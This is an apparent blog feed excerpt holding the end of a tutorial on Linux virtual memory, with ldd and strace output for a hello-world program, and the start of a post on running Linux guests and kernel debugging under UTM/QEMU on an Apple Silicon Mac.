<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ ldd hw
</span></span><span class="line"><span class="cl">        linux-vdso.so.1 (0x00007ffecb53e000)
</span></span><span class="line"><span class="cl">        libc.so.6 =&gt; /usr/lib/libc.so.6 (0x00007fc3747f3000)
</span></span><span class="line"><span class="cl">        /lib64/ld-linux-x86-64.so.2 =&gt; /usr/lib64/ld-linux-x86-64.so.2 (0x00007fc3749f3000)
</span></span></code></pre></div><p><code>ldd</code> prints the shared objects (shared libraries) dependencies required by our dynamically compiled <code>hw.c</code>, in our context, this means when we map our program into it&rsquo;s virtual address space, we&rsquo;ve also got to map any necessary dependencies too.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">$</span> <span class="n">strace</span> <span class="o">./</span><span class="n">hw</span>
</span></span><span class="line"><span class="cl"><span class="n">execve</span><span class="p">(</span><span class="s2">&#34;./hw&#34;</span><span class="p">,</span> <span class="p">[</span><span class="s2">&#34;./hw&#34;</span><span class="p">],</span> <span class="mh">0x7ffd3ee6c190</span> <span class="o">/*</span> <span class="mi">62</span> <span class="n">vars</span> <span class="o">*/</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">brk</span><span class="p">(</span><span class="n">NULL</span><span class="p">)</span>                               <span class="o">=</span> <span class="mh">0x563a56b24000</span>
</span></span><span class="line"><span class="cl"><span class="n">arch_prctl</span><span class="p">(</span><span class="mh">0x3001</span> <span class="o">/*</span> <span class="n">ARCH_</span><span class="err">???</span> <span class="o">*/</span><span class="p">,</span> <span class="mh">0x7fff70afecc0</span><span class="p">)</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="n">EINVAL</span> <span class="p">(</span><span class="n">Invalid</span> <span class="n">argument</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">access</span><span class="p">(</span><span class="s2">&#34;/etc/ld.so.preload&#34;</span><span class="p">,</span> <span class="n">R_OK</span><span class="p">)</span>      <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="n">ENOENT</span> <span class="p">(</span><span class="n">No</span> <span class="n">such</span> <span class="n">file</span> <span class="ow">or</span> <span class="n">directory</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">openat</span><span class="p">(</span><span class="n">AT_FDCWD</span><span class="p">,</span> <span class="s2">&#34;/etc/ld.so.cache&#34;</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="o">|</span><span class="n">O_CLOEXEC</span><span class="p">)</span> <span class="o">=</span> <span class="mi">3</span>
</span></span><span class="line"><span class="cl"><span class="n">newfstatat</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="p">{</span><span class="n">st_mode</span><span class="o">=</span><span class="n">S_IFREG</span><span class="o">|</span><span class="mi">0644</span><span class="p">,</span> <span class="n">st_size</span><span class="o">=</span><span class="mi">180840</span><span class="p">,</span> <span class="o">...</span><span class="p">},</span> <span class="n">AT_EMPTY_PATH</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">180840</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51e1000</span>
</span></span><span class="line"><span class="cl"><span class="n">close</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>                                <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">openat</span><span class="p">(</span><span class="n">AT_FDCWD</span><span class="p">,</span> <span class="s2">&#34;/usr/lib/libc.so.6&#34;</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="o">|</span><span class="n">O_CLOEXEC</span><span class="p">)</span> <span class="o">=</span> <span class="mi">3</span>
</span></span><span class="line"><span class="cl"><span class="n">read</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\177</span><span class="s2">ELF</span><span class="se">\2\1\1\3\0\0\0\0\0\0\0\0\3\0</span><span class="s2">&gt;</span><span class="se">\0\1\0\0\0</span><span class="s2">`|</span><span class="se">\2\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">832</span><span class="p">)</span> <span class="o">=</span> <span class="mi">832</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\6\0\0\0\4\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">784</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span> <span class="o">=</span> <span class="mi">784</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\4\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\5\0\0\0</span><span class="s2">GNU</span><span class="se">\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">848</span><span class="p">)</span> <span class="o">=</span> <span class="mi">80</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\4\0\0\0\24\0\0\0\3\0\0\0</span><span class="s2">GNU</span><span class="se">\0</span><span class="s2">K@g7</span><span class="se">\5</span><span class="s2">w</span><span class="se">\10\300\344\306</span><span class="s2">B4Zp&lt;G&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">928</span><span class="p">)</span> <span class="o">=</span> <span class="mi">68</span>
</span></span><span class="line"><span class="cl"><span class="n">newfstatat</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="p">{</span><span class="n">st_mode</span><span class="o">=</span><span class="n">S_IFREG</span><span class="o">|</span><span class="mi">0755</span><span class="p">,</span> <span class="n">st_size</span><span class="o">=</span><span class="mi">2150424</span><span class="p">,</span> <span class="o">...</span><span class="p">},</span> <span class="n">AT_EMPTY_PATH</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">8192</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51df000</span>
</span></span><span class="line"><span class="cl"><span class="n">pread64</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\6\0\0\0\4\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">@</span><span class="se">\0\0\0\0\0\0\0</span><span class="s2">&#34;</span><span class="o">...</span><span class="p">,</span> <span class="mi">784</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span> <span class="o">=</span> <span class="mi">784</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">1880536</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5013000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab5039000</span><span class="p">,</span> <span class="mi">1355776</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_EXEC</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mh">0x26000</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5039000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab5184000</span><span class="p">,</span> <span class="mi">311296</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mh">0x171000</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5184000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab51d0000</span><span class="p">,</span> <span class="mi">24576</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mh">0x1bc000</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51d0000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab51d6000</span><span class="p">,</span> <span class="mi">33240</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51d6000</span>
</span></span><span class="line"><span class="cl"><span class="n">close</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>                                <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">8192</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5011000</span>
</span></span><span class="line"><span class="cl"><span class="n">arch_prctl</span><span class="p">(</span><span class="n">ARCH_SET_FS</span><span class="p">,</span> <span class="mh">0x7f9ab51e0580</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mprotect</span><span class="p">(</span><span class="mh">0x7f9ab51d0000</span><span class="p">,</span> <span class="mi">12288</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mprotect</span><span class="p">(</span><span class="mh">0x563a56a14000</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mprotect</span><span class="p">(</span><span class="mh">0x7f9ab523c000</span><span class="p">,</span> <span class="mi">8192</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">munmap</span><span class="p">(</span><span class="mh">0x7f9ab51e1000</span><span class="p">,</span> <span class="mi">180840</span><span class="p">)</span>          <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">newfstatat</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="p">{</span><span class="n">st_mode</span><span class="o">=</span><span class="n">S_IFCHR</span><span class="o">|</span><span class="mi">0600</span><span class="p">,</span> <span class="n">st_rdev</span><span class="o">=</span><span class="n">makedev</span><span class="p">(</span><span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x1</span><span class="p">),</span> <span class="o">...</span><span class="p">},</span> <span class="n">AT_EMPTY_PATH</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">brk</span><span class="p">(</span><span class="n">NULL</span><span class="p">)</span>                               <span class="o">=</span> <span class="mh">0x563a56b24000</span>
</span></span><span class="line"><span class="cl"><span class="n">brk</span><span class="p">(</span><span class="mh">0x563a56b45000</span><span class="p">)</span>                     <span class="o">=</span> <span class="mh">0x563a56b45000</span>
</span></span><span class="line"><span class="cl"><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&#34;Hello, World!</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="mi">14</span><span class="n">Hello</span><span class="p">,</span> <span class="ne">World</span><span class="o">!</span>
</span></span><span class="line"><span class="cl"><span class="p">)</span>         <span class="o">=</span> <span class="mi">14</span>
</span></span><span class="line"><span class="cl"><span class="n">exit_group</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>                           <span class="o">=</span> <span class="err">?</span>
</span></span><span class="line"><span class="cl"><span class="o">+++</span> <span class="n">exited</span> <span class="n">with</span> <span class="mi">0</span> <span class="o">+++</span>
</span></span></code></pre></div><p><code>strace</code> allows us to trace system calls and signals. System calls are (as we can learn via <code>man syscalls</code>[1] the fundamental interface between an application and the Linux kernel.</p>
<p>So as we can see, there&rsquo;s an awful lot going on under the hood of our little &ldquo;Hello, World!&rdquo; program - it isn&rsquo;t until write at the bottom we see our actual <code>write</code> syscall to write our string <code>&quot;Hello, World!&quot;</code> to <code>stdout</code> (aka the console)!</p>
<p>That&rsquo;s because the majority of that is setting up the virtual address space for our program. It might not all make sense now, but we can see our dependencies from <code>ldd</code> being setup as well as various memory related syscalls including <code>brk</code>, <code>mmap</code>, <code>mprotect</code> and <code>munmap</code>.</p>
<ol>
<li>In Linux world, basically everything is considered a process or a file, so even multiple threads of the same running program are all viewed as separate processes</li>
<li>The second section of man, <code>man 2</code>, is for syscall manuals. So if you want to read more about <code>read</code> above for example, you can use <code>man 2 read</code> for the syscall&rsquo;s man page</li>
</ol>
<h3 id="user-mode-kernel-mode">User-mode &amp; Kernel-mode</h3>
<p>So as we just saw, for a program to even be loaded into memory and run as a process, there&rsquo;s an awful lot of interaction that needs to go on with the kernel.</p>
<p>We established that syscalls act as an interface between an application and the Linux kernel, meaning that on the other end of that syscall there&rsquo;s some kernel code running.</p>
<p>Let&rsquo;s pause a moment and quickly touch on why syscalls are even a thing. Why not just have the process do the systemy thing it needs to do directly? Like in a standard library?</p>
<p>The reason is due to privilege levels. The tl;dr on this is that our hardware let&rsquo;s us select several different privilege levels, and in Linux we make use of two of these. So at any given time we are running in user-mode or kernel-mode.</p>
<p>As a result we also have the terms user-space and kernel-space. Typically stuff in user-space is running in user-mode and stuff in kernel-space run in kernel-mode.</p>
<p>The kernel resides firmly in kernel-space and as such can only be run in kernel-mode and the only way for a user-space process to change the privilege level is via a syscall.</p>
<p><img src="https://sam4k.com/content/images/2022/01/youshallntpass.gif" alt=""></p>
<p>So, syscalls act as gatekeepers of sorts, allowing user-space processes to get the kernel to carry out specific, privileged actions on its behalf, without giving away the keys to the kingdom.</p>
<h3 id="queue-the-vm-split">Queue The VM Split!</h3>
<p>So to sum up what we know so far:</p>
<ul>
<li>Each process has its own, sandboxed, virtual address space</li>
<li>Each process needs to run kernel code to setup its VAS, done via syscalls</li>
</ul>
<p>This begs the question, after we call our syscall and transfer to kernel-mode, we&rsquo;re still running within the same process context, so how do we know where the kernel code is?</p>
<p>We map the kernel into the VAS, that&rsquo;s how! Almost like a shared library, the kernel is also mapped into the VAS, I mean we have enough space right?</p>
<p>There&rsquo;s an overhead to switching the CPU&rsquo;s context (tl;dr there&rsquo;s context specific registers that get swapped in and out when we want to run in a different context, e.g. run another process), so to avoid this the kernel is mapped into the same VAS as the process.</p>
<p>This is all implemented by splitting the virtual memory into two sections, the User Virtual Address Space and the Kernel Virtual Address Space:</p>
<p><img src="https://sam4k.com/content/images/2022/01/vmsplit.png" alt=""></p>
<p>x86_64 VM split</p>
<p>On x86_64 Linux systems, we can see the lower 128TB of memory is assigned to the user virtual address space and the upper 128TB is assigned to the kernel virtual address space.The rest? Well that&rsquo;s just an unused, no man&rsquo;s land bridging the gap between the two.</p>
<p>In fact, on typical x86_64 setups today only 48 bits of the virtual address are actually used; the most significant 16 bits (MSB 16) are always set to 0 for the User VAS and 1 for the Kernel VAS. Makes it convenient for spotting what kind of address you&rsquo;re looking at in a debugger!</p>
<p>The exact proportions of the VM split and details like how many bits are used for addressing are architecture &amp; config specific.</p>
<h2 id="next-time">Next Time!</h2>
<p>Today we laid the groundwork for our journey to understanding virtual memory on modern Linux systems. We briefly covered what we mean when we talk about physical vs virtual memory, followed by an understanding of the virtual address space itself.</p>
<p>Now that we understand how (and at a high level why) the virtual address space is split up into the two sections - the User VAS &amp; Kernel VAS - next time we can delve deeper into each of these sections.</p>
<p>Furthermore, I want us to get a closer look at the lower level details on what&rsquo;s going on behind the scene in the kernel in regards to memory management as well as touching on the role the hardware plays in enabling this.</p>
<p>And likely much, much more - so stay tuned!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Setting Up A Virtualised (Linux) Empire on Apple Silicon</title><description>Follow me on my journey moving my virtualisation workflow as a Linux security researcher from Linux x86_64 to MacOS aarch64.</description><link>https://sam4k.com/setting-up-a-virtualised-linux-empire-on-apple-silicon/</link><guid isPermaLink="false">61d4eaa5484d4d42c8e4a6aa</guid><category>linux</category><category>macos</category><category>tooling</category><dc:creator>sam4k</dc:creator><pubDate>Sat, 08 Jan 2022 19:07:10 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/01/behold.gif" medium="image"/><content:encoded><![CDATA[<p>I recently started an awesome new role as a Sr. Security Researcher (yay me) and as a work from home position this came with the perk of picking some shiny new work kit; with the two main contenders being a new Dell Precision or a MacBook Pro.</p>
<p>In my infinite wisdom (read: hubris), of course I opted for the new MacBook Pro - after all, with all the headlines and buzz, I wanted to see what this M1 fuss was all about!</p>
<p><img src="https://sam4k.com/content/images/2022/01/oops.jpg" alt=""></p>
<p>The panic started to set in, had I made a horrific decision? In getting caught up in the hype and excitement I&rsquo;d forgotten the implications of switching my workflow to a completely different architecture, and one as new as Apple&rsquo;s Silicon.</p>
<p>However, after some time researching, tweaking and debugging I&rsquo;m now in a position where I can happily say I have no regrets moving to Apple Silicon and in fact am beginning to see what the hype is all about! Of course, this isn&rsquo;t to say the grass really is perfectly green on the other side, there are still issues, particularly due to it&rsquo;s infancy, but more on that soon!</p>
<p>So without further ado, below is the culmination of moments of bewilderment, exasperation and elation as I transitioned my workflow as a Linux security researcher from Linux x86_64 to MacOS aarch64.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#my-virtualised-empire">My Virtualised Empire</a></li>
<li><a href="#virtualisation-options-on-m1">Virtualisation Options on M1</a></li>
<li><a href="#utm-a-whistle-stop-tour">UTM: A Whistle-stop Tour</a>
<ul>
<li><a href="#aarch64-guests">Aarch64 Guests</a></li>
<li><a href="#x8664-guests">x86_64 Guests</a>
<ul>
<li>Performance</li>
<li>Weirdness</li>
</ul>
</li>
<li><a href="networking">Networking</a></li>
<li><a href="#kernel-debugging-with-gdb">Kernel Debugging with GDB</a>
<ul>
<li>Host-Guest</li>
<li>Guest-Guest</li>
<li>Also, No GDB on HVF</li>
</ul>
</li>
<li><a href="#resizing-disks">Resizing Disks</a></li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<h2 id="my-virtualised-empire">My Virtualised Empire</h2>
<p>So, turns out the title might have been a little clickbaity, as my virtual empire is more of a virtual hamlet. Before I take any more of your time, take a look at the diagram below:</p>
<p><img src="https://sam4k.com/content/images/2022/01/netdiag.png" alt=""></p>
<p>This is the general gist of what I set out to, and outline how to, achieve in this post. As a security researcher and Linux enthusiast there we a couple of important factors:</p>
<ul>
<li>I want a &lsquo;dev&rsquo; guest that would run Linux and be my main development workhorse; this is where I&rsquo;d be spending a lot of time so performance is key</li>
<li>I need to be able to spin up a variety of &lsquo;research&rsquo; guests; likely short lived and many so ease of setup is important</li>
<li>Speaking of variety, I need to be able to spin up guests running on difference architectures, specifically aarch64 (native) and x86_64 (emulated)</li>
<li>Finally, I break things &hellip; often. So debugging is important too! While not strictly relevant to the overarching topic of virtualisation, I&rsquo;ll touch on this briefly</li>
</ul>
<p>And, well, that&rsquo;s about it! If this sounds of any interest to you, feel free to continue reading as I outline how I achieved this setup, the thought process behind some of my choices and likely most relevant are some of the gotchas I encountered along the way.</p>
<h2 id="virtualisation-options-on-m1">Virtualisation Options on M1</h2>
<p>Before receiving my MacBook Pro, I primarily worked in Linux environments and my virtualisation software of choice was VMWare Workstation. Moving to MacOS, I wasn&rsquo;t sure what the virtualisation ecosystem was like.</p>
<p>Unsurprisingly VMWare was still a big name, with their MacOS software hypervisor <a href="https://www.vmware.com/uk/products/fusion.html">Fusion</a> being popular. However, it wasn&rsquo;t the only contender. <a href="https://www.parallels.com/uk/">Parallels</a> is also another popular choice for virtualisation on MacOS. Slightly less in the limelight were <a href="https://www.virtualbox.org">VirtualBox</a> and QEMU-based <a href="https://mac.getutm.app">UTM</a>.</p>
<p>I won&rsquo;t bore you with a breakdown of the various features, pros and cons for each of these products because in the end it was an extremely simple decision. Mainly due to the fact that UTM is the only one (at the time of writing) that meets all my criteria above.</p>
<p>As far as I know, VMWare and Parallels have no plans to support x86_64 emulation on M1&rsquo;s and VirtualBox doesn&rsquo;t have any kind of M1 support yet. See? Easy!</p>
<h2 id="utm-a-whistle-stop-tour">UTM: A Whistle-stop Tour</h2>
<p><img src="https://sam4k.com/content/images/2022/01/buckleup.gif" alt=""></p>
<p><a href="https://mac.getutm.app">UTM</a> is another virtualisation software built specifically for Apple products. What&rsquo;s really neat about UTM for my criteria is that it&rsquo;s built on top of <a href="https://www.qemu.org">QEMU</a>. For those that haven&rsquo;t heard of it, QEMU is a free and open-source hypervisor. In particular:</p>
<ul>
<li>UTM can use Apple&rsquo;s hypervisor framework<a href="https://developer.apple.com/documentation/hypervisor">[1]</a> to virtualise aarch64 guests at near native speeds, which is great for my dev box!</li>
<li>Furthermore, UTM provides the option to use QEMU&rsquo;s Tiny Code Generator (TCG)<a href="https://wiki.qemu.org/Documentation/TCG">[2]</a> which allows us to emulate different architectures (at a significant performance cost)</li>
<li>For those that have used QEMU in the past, UTM provides an amazingly simplified yet flexible front-end for the deluge of different parameters QEMU can take</li>
<li>By using QEMU, we have access to the gdbstub QEMU employs for kernel-level debugging (with caveats below)</li>
</ul>
<p>For people reading this near time of publication, I heartily recommend using the UTM 3.0.0 (beta) release which can be found <a href="https://github.com/utmapp/UTM/releases/tag/v3.0.0">here</a>. It adds some important features, as well as some neat quality of life improvements.</p>
<ol>
<li><a href="https://developer.apple.com/documentation/hypervisor">https://developer.apple.com/documentation/hypervisor</a></li>
<li><a href="https://wiki.qemu.org/Documentation/TCG">https://wiki.qemu.org/Documentation/TCG</a></li>
</ol>
<h3 id="aarch64-guests">Aarch64 Guests</h3>
<p>Okay, let&rsquo;s start off with the simplest setup. If you have no architecture requirements, you definitely want to run an aarch64 guest to match your M1 host&rsquo;s architecture. This allows you to make full use of Apple&rsquo;s hypervisor framework and get the best performance.</p>
<p>In terms of guest OS, you&rsquo;ll need to make sure you&rsquo;re running an arm64/aarch64 build! Unfortunately the demand is still scaling up for these, so you may find your favourite distro might not have support for this. I made do with Ubuntu 22.04 Jammy, as they have a aarch64 desktop build handy<a href="https://cdimage.ubuntu.com/daily-live/current/">[1]</a>. For Arch users, there&rsquo;s also <a href="https://archlinuxarm.org">ArchLinux ARM</a>.</p>
<p>For setup, it&rsquo;s really as simple as following the UTM setup wizard[2]. The main thing to remember is that we want to choose &ldquo;Virtualise&rdquo; as we don&rsquo;t need to emulate another architecture. Other than that, it&rsquo;s all fairly straightforward. No tweaks needed!</p>
<ol>
<li><a href="https://cdimage.ubuntu.com/daily-live/current/">https://cdimage.ubuntu.com/daily-live/current/</a></li>
<li>Requires UTM 3.0.0+</li>
</ol>
<h3 id="x8664-guests">x86_64 Guests</h3>
<p>Moving on, now we&rsquo;ve got our dev guest up, what if we want to do some x86_64 activities? Again, using the UTM wizard we&rsquo;ll want to this time select &ldquo;emulation&rdquo; and proceed with the rest of the wizard, so far so good!</p>
<p>Now for the bad news, in order to emulate another architecture we need to use TCG, QEMU&rsquo;s Tiny Code Generator. Unsurprisingly emulating a completely different CPU architecture is a lot slower than using the native hypervisor we were able to previously.</p>
<h4 id="performance">Performance</h4>
<p>To mitigate the impact of this, there&rsquo;s a few things we can do:</p>
<ul>
<li>Avoid GUIs where possible! That&rsquo;s right, pick up a server edition or something</li>
<li>If you must, be stingy on resolution where possible; in the <code>VM settings -&gt; &quot;Display&quot;</code>, consider the graphics type and disabling retina mode</li>
<li>Go into <code>VM settings -&gt; &quot;System&quot; -&gt; &quot;Show Advanced Settings&quot;</code> and make sure to up the cores if possible and check &ldquo;Force Multicore&rdquo;; on x86_64 at least this is seen to have marked improvements on perf</li>
<li>In the same section as above, I&rsquo;d also recommend the <code>qemu64</code> CPU for best compatibility results unless you have specific requirements</li>
</ul>
<p><img src="https://sam4k.com/content/images/2022/01/x86_64.jpg" alt=""></p>
<h4 id="weirdness">Weirdness</h4>
<p>Again, unsurprisingly, weird things can crop up when running a fully-fledged Linux operating system on an emulated architecture, and I mean WEIRD. Programs not working? System errors popping up? Kernel panics?</p>
<p>This could be a result of missing &ldquo;CPU Flags&rdquo;, under the <code>VM settings -&gt; &quot;System&quot; -&gt; &quot;Show Advanced Settings&quot;</code>. Yep, there&rsquo;s a lot. Over the years these have accumulated and you might find that some x86_64 instructions that are being run in your guest might require specific flags to be enabled.</p>
<p>I had a situation where some software running and then instantly crashing. Some digging later and it turned out it&rsquo;s kernel driver was failing to load due to a <code>SIGILL</code>, which turned out to be a specific instruction in a crypt library it was using. It was a matter of googling <code>&lt;instruction_here&gt; cpu flag</code> and I was able to find the culprit.</p>
<h3 id="networking">Networking</h3>
<p>After years spinning up my own shoddy initramfs based QEMU VMs through bash scripts, I learned to stay clear of any kind of networking. It just never panned out. Luckily, I can say the absolute opposite for UTM. For me, it just worked.</p>
<p><img src="https://sam4k.com/content/images/2022/01/net.jpg" alt=""></p>
<p>All of my VMs are configured with the &ldquo;Shared Network&rdquo; network mode, in the <code>VM settings -&gt; &quot;Network&quot;</code>, with the <code>virtio-net-pci</code> card. With this setup, each of your guests can access the internet like a classic NAT setup, with the added bonus of a bridge on the host which will allow all your guests (and host) to communicate to one another.</p>
<h3 id="kernel-debugging-with-gdb">Kernel Debugging with GDB</h3>
<p>The process of setting this empire up, let alone my job, required being able to do some kernel debugging on my guests. Like other virtualisation software, QEMU provides a gdbstub which will act as a gdb server on your guest, allowing you to connect remotely and debug the guests kernel - it&rsquo;s pretty neat<img src="https://qemu.readthedocs.io/en/latest/system/gdb.html" alt="[1]"></p>
<ol>
<li><a href="https://qemu.readthedocs.io/en/latest/system/gdb.html">https://qemu.readthedocs.io/en/latest/system/gdb.html</a></li>
</ol>
<h4 id="host-guest">Host-Guest</h4>
<p>It uses the exact same arguments as QEMU, if you&rsquo;re familiar with that, so we just need add the <code>-s</code>[1] argument to our guest and it&rsquo;ll set up the gdbstub on your <em>GUEST</em> to listen on <code>localhost:1234</code> on your <em>HOST.</em></p>
<p>To do this we go to <code>VM settings -&gt; &quot;QEMU&quot;</code>. This section will show you how your configuration and settings translate into QEMU arguments. If we scroll to the bottom there&rsquo;s an input labelled &ldquo;New&rdquo; where we can add our own. Pop in <code>-s</code> and we&rsquo;re good!</p>
<p><img src="https://sam4k.com/content/images/2022/01/hostdbg.jpg" alt=""></p>
<p>Now, if we open the terminal on our MacOS host and start gdb w- just kidding, gdb doesn&rsquo;t have a build available for M1&rsquo;s at the time of writing. But you CAN use lldb to connect to the remote server currently listening on <code>localhost:1234</code> if you&rsquo;re so inclined, otherwise&hellip;</p>
<ol>
<li>QEMU users might be used to <code>-s -S</code>, where the <code>-S</code> will tell QEMU to not start the guest until you tell it to via gdb; this is already in use by UTM as far as I can tell, so we just make do without</li>
</ol>
<h4 id="guest-guest">Guest-Guest</h4>
<p>Ew, lldb right?! If you want to be able to debug a guest from another guest, in my case I want to be able to use gdb on my dev guest to debug one of my research targets.</p>
